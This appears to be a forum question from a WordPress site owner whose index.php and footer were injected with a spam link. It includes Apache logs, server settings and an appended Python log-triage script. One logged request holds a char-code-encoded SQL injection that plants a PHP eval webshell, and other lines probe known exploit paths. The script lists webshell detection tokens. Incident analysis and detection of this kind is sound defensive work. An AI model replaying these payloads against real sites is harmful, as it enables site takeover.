I woke up today to find the top and bottom of my website showing a link with the text "Cheap Jerseys Free Shipping".
I quickly logged in and saw that /index.php and /wp-content/themes/Avada/footer.php had been modified; I removed the links and saved the files.
I want to know how the person got access to both files so I can fix it. I have searched everywhere I can think of; can someone please let me know where to look?
This is what my index.php looked like before I fixed it:
<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
I have hardened my WordPress site following the WordPress hardening guide. The site is hosted on Amazon Lightsail.
- Two users have SSH access: me with sudo, and VaultPress, which has limited access to the /web directory. SSH access is tied to an instant email notification, so as soon as someone logs in via SSH an email is sent with the IP. The access logs show that no SSH access was granted.
- Two FTP users who have read-only access limited to the /web/downloads/ and /web/update directories only.
- Only 1 user in WordPress, and the password has now been changed. /wp-admin has Order deny,allow / Allow from all / Satisfy any and password authentication, with the password file in a dot-directory: AuthType Basic, AuthName "Admins only", AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx", Require valid-user. wp-config.php in the / directory has Order allow,deny / Deny from all.
- All access through the firewall is blocked except SSH (22), 80 and 443. Database access is limited to localhost only.
- Google Tag Manager was not modified and only includes links to Analytics, AdWords and specific click analytics.
The access log entries (Apache web access log) that looked suspicious are below, although I don't know what they mean. The VaultPress backups show the change happened between August 28 (2:38 AM) and August 29 (2:38 AM).
27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621
128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - [email protected] [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - [email protected] [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - [email protected] [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953
My WordPress site information
### Avada Versions ###
Current Version: 5.6.2
Previous Version: 5.5.2 5.6.0 5.6.1
### WordPress Environment ###
Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US
### Server Environment ###
Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000
MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1
### Active Plugins (11) ###
VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms
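The log excerpt in the question contains two patterns worth triaging mechanically: one IP generating a burst of 404s against PHP paths that do not belong to WordPress at all (scanner behaviour aimed at other CMSes), and a request whose `arrs1[]`/`arrs2[]` parameters are a long run of integers, which is a string smuggled in as character codes. The following Python script is an added example written for this answer, not code from the question or from any of the tools it mentions. It parses Apache combined-format lines, decodes integer-array parameters back to text, flags decoded text containing PHP-ish tokens or known probe paths, and counts PHP 404s per client. The sample log lines, IP addresses and the encoded payload fragment are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache combined/common log line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens that should never appear in the decoded query string of a normal visit.
SUSPICIOUS_TOKENS = ("<?php", "eval(", "file_put_contents(", "base64_decode(")

# Path fragments typical of scanners probing for other CMSes or leftover tooling
# (chosen from the kinds of paths seen in the question's log; not an exhaustive list).
PROBE_PATHS = ("eval-stdin.php", "/install/", "/install.php", "shell", "/plus/")

# Constructed sample log lines (documentation-range IPs, not from the question).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1'
    '&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32'
    '&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40 HTTP/1.1" 404 94621',
    '203.0.113.7 - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621',
    '203.0.113.7 - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621',
    '198.51.100.9 - - [27/Aug/2018:11:20:44 +0000] "GET /blog/some-post/ HTTP/1.1" 200 103653',
    '198.51.100.9 - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735',
    '198.51.100.9 - - [29/Aug/2018:14:38:51 +0000] "-" 408 152',  # malformed request, skipped
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)  # name -> list of values
    return rec


def decode_array_params(query):
    """Join integer-valued array params (name[]=60&name[]=63...) back into text.

    A long run of character codes is a common way to carry a string past naive
    filters; seeing the decoded text tells the analyst what the request tried to do.
    """
    decoded = {}
    for name, values in query.items():
        if name.endswith("[]") and len(values) > 1 and all(v.isdigit() for v in values):
            decoded[name] = "".join(chr(int(v)) for v in values if 0 < int(v) < 128)
    return decoded


def triage(lines):
    """Return per-IP counts of 404s on .php paths and a list of flagged requests."""
    php_404s = defaultdict(int)
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404 and rec["path"].endswith(".php"):
            php_404s[rec["ip"]] += 1
        reasons = []
        for name, text in decode_array_params(rec["query"]).items():
            hits = [tok for tok in SUSPICIOUS_TOKENS if tok in text]
            if hits:
                reasons.append(f"encoded {name} contains {hits}")
        if any(frag in rec["path"] for frag in PROBE_PATHS):
            reasons.append("known probe path")
        if reasons:
            findings.append((rec["ip"], rec["path"], reasons))
    return {"php_404_by_ip": dict(php_404s), "findings": findings}


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for ip, count in report["php_404_by_ip"].items():
        print(f"{ip}: {count} x 404 on .php paths")
    for ip, path, reasons in report["findings"]:
        print(f"FLAG {ip} {path}: {'; '.join(reasons)}")
```

In the question's own log the scanning IP only ever receives 404s and the edits happened a day later, so a script like this is useful for separating background noise from the event of interest: a request with status 200 that touched a file in a writable location, or a successful login on wp-login.php, would be the lines to correlate with the VaultPress change window, and the same parsed records can be filtered on `status == 200` and `method == "POST"` for that purpose.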